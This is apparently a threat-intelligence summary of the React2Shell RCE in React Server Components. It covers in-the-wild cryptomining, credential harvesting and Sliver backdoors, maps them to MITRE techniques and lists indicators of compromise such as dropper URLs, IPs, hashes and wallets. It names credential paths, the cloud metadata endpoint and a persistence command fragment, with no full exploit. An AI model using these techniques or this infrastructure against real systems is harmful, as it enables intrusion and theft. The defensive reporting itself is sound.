React2Shell: Technical Deep-Dive & In-the-Wild Exploitation of CVE-2025-55182

React2Shell (CVE-2025-55182) is a critical RCE in React Server Components that enables arbitrary code execution via improperly deserialized RSC payloads and has been widely exploited against internet-facing Next.js and other RSC-enabled platforms. In the wild activity includes opportunistic cryptomining, large-scale credential harvesting (including cloud metadata access), and operator-driven backdoors using Sliver implants. #React2Shell #Nextjs

Keypoints

CVE-2025-55182 (“React2Shell”) is a deserialization-based RCE in React Server Components that allows arbitrary server-side code execution when malicious RSC payloads are parsed.
Next.js is highly exposed (the next-action header makes the vulnerable flow trivially reachable), but the flaw also affects Waku, Vite (with RSC plugin), and custom/native React server implementations using the vulnerable decoder.
Active exploitation observed in the wild includes quick pivoting from reconnaissance to interactive reverse shells, aggressive environment discovery, and exfiltration to attacker-controlled infrastructure.
Attackers are harvesting developer and cloud credentials (scanning .env, .ssh, .aws, .kube, querying 169.254.169.254 for instance metadata) and bundling results for exfiltration.
Multiple cryptomining campaigns leverage the bug (UPX-packed XMRig variants, stock XMRig pulls, installer scripts), and at least one campaign deployed Sliver-based backdoors for persistent operator-driven access.
Proof-of-concept relies on gadget chains and the native Function() constructor during deserialization (self-references across chunks) to escalate a parsed payload into executed JavaScript code.
Detection requires both dynamic scanning of exposed endpoints and static/code-level validation to find vulnerable react packages across frameworks and custom servers; remediation guidance is provided in the vendor/response blogpost.

MITRE Techniques

[T1190 ] Exploit Public-Facing Application – The vulnerability is exploited for RCE against internet-facing Next.js and other RSC servers (‘critical Remote Code Execution (RCE) vulnerability in React’).
[T1059 ] Command and Scripting Interpreter – Attackers obtain interactive shells and run one-liners, base64-encoded scripts, and tooling via curl/wget/nc (‘interactive reverse shells’ and ‘one-liners … sent back to attacker-controlled infrastructure via curl or nc’).
[T1082 ] System Information Discovery – Adversaries collect system and environment details (whoami, hostname, env vars) to fingerprint compromised containers (‘whoami, hostname, environment variable dumps’).
[T1083 ] File and Directory Discovery – Recursive scans of filesystem paths for config and keys target .env, JSON/YAML configs, SSH keys and other secrets (‘Recursively scans key filesystem paths (/home, /root, /etc, /var/www, /opt) for config and key material’).
[T1071.004 ] Application Layer Protocol: DNS – DNS-based beaconing to oast*. domains is used to confirm execution and egress and to fingerprint targets (‘extensive use of oast*. domains and similar callback infrastructure’).
[T1071.001 ] Application Layer Protocol: Web Protocols – Exfiltration and C2 use HTTP(S) endpoints and HTTP POST uploads to attacker infrastructure (‘Bundles all findings into a single report file and uploads it via HTTP POST to attacker-controlled infrastructure’).
[T1105 ] Ingress Tool Transfer – Attackers retrieve and run external payloads (downloaders, XMRig, Sliver payloads) from attacker-controlled hosts (‘downloaded shell scripts from a dynamic DNS host that in turn fetched Sliver payloads (64-bit ELF binaries) and executed them’).
[T1496 ] Resource Hijacking – Compromised containers are used to deploy cryptominers and hijack compute for Monero mining (‘cryptomining campaigns leveraging CVE-2025-55182’ and XMRig deployment examples).
[T1053.005 ] Scheduled Task/Job: cron – Adversaries use nohup and disguised cron-like processes for persistence inside containers (‘using nohup /var/tmp/crond as a disguised persistence mechanism inside the container’).
[T1005 ] Data from Local System – Attackers collect sensitive files and secrets from local paths (SSH keys, .aws, wallet data) for credential harvesting and lateral/cloud escalation (‘Targets common cloud/dev paths such as .ssh, .aws, .kube, .config/gcloud, and multiple cryptocurrency wallet locations’).
[T1531 ] Cloud Instance Metadata Access – Adversaries attempt to retrieve IAM credentials from the instance metadata service to escalate cloud privileges (‘Attempts to access the cloud instance metadata service at 169.254.169.254/latest/meta-data/iam/security-credentials/’).

Indicators of Compromise

[IP Address ] malware/hosting/stealer infrastructure – 45.32.158.54 (malware host), 154.89.152.240 (dropper/check.sh), and 10+ other IPs observed in the appendix.
[Domain ] malware and loader infrastructure – anywherehost.site (malware infra/dropper), inerna1.site (malware infra/miner), and related domains (ax29g9q123.anondns.net, keep.camdvr.org, tr.earn.top).
[URL ] droppers, miners, and payloads – hxxp://anywherehost.site/xms/k1.sh (dropper), hxxp://keep.camdvr.org:8000/BREAKABLE_PARABLE5 (Sliver payload), and many other dropper/miner URLs listed in the appendix.
[SHA1 Hash ] scripts, miners, and Sliver binaries – 264e1a820b8b3bbd13325955f06aff2678c69935 (script), 0972859984decfaf9487f9a2c2c7f5d2b03560a0 (Sliver), and ~20+ additional SHA1s for scripts, miners, and payloads.
[Monero Wallet ] mining payout addresses – 44VvVLU2Vmja6gTMbhNHAzc7heYTiT7V… (Monero wallet), 42NTfUjbU3Gj536zubU7vpjfC7X9DPEC… (Monero wallet) referenced in the appendix.
[File Name ] payloads/runfiles used by attackers – systemd-devd.$(uname -m) (masqueraded miner binary), runner.zip (miner/loader), and other filenames observed in dropper URLs.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print